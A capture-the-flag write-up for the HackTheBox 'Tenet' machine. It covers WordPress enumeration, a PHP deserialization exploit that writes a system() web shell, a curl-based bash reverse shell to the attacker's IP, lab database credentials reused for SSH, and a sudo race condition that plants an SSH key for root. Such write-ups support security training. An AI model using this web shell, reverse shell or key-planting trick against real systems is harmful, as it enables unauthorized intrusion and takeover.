Blog Write-ups Contact

HTB Tenet

Writeup for Tenet box on HackTheBox.eu

Initial Enumration

nmap -sC -sV -vv -oA tcp 10.129.80.224 -Pn

Found wordpress http://10.129.80.224/wordpress/

Seems like wordpress is set to resove the http://tenet.htb/

[+] protagonist
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://tenet.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] neil
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Found:

http://rotas.htb/sator.php
http://rotas.htb/users.txt

found http://10.129.88.28/sator.php.bak which allows us to download the sourcecode

The exploit

<?php

class DatabaseExport
{
	public $user_file = 'sh.php';
	public $data = '<?php if(isset($_REQUEST["s"])){ echo "<pre>";system($_REQUEST["s"]); echo"</pre>"; } ?>';

	public function update_db()
	{
		echo '[+] Grabbing users from text file <br>';
		$this-> data = '';
	}


	public function __destruct()
	{
		file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
		echo '[+] Database updated <br>';
	//	echo 'Gotta get this working properly...';
	}
}


$d = serialize(new DatabaseExport());
print_r($d);

The above file will generate a serialised version of DatabseExport class which we can send over to sator.php file

curl 'http://10.129.88.28/sator.php?aerop=O:14:"DatabaseExport":2:{s:9:"user_file";s:6:"sh.php";s:4:"data";s:88:"<?php if(isset($_REQUEST["s"])){ echo "<pre>";system($_REQUEST["s"]); echo"</pre>"; } ?>";}'

The arepo parameter should be urlencoded but for readability it's not.

Get a reverse shell via the web shell uploaded initially:

curl 'http://10.129.88.28/sh.php' -d 's=/bin/bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.58/8443+0>%261"'

Enumeration

Mysql Credentials in wp-config.php

define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'neil' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );

The same password works for ssh as neil

User enumeration

Privilege escalation

Read / Write race condition

cd /tmp
while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAA.... [email protected]" | tee ssh-*; done

Having the while loop run in the background we then run the command as sudo which will add out ssh key to the root user.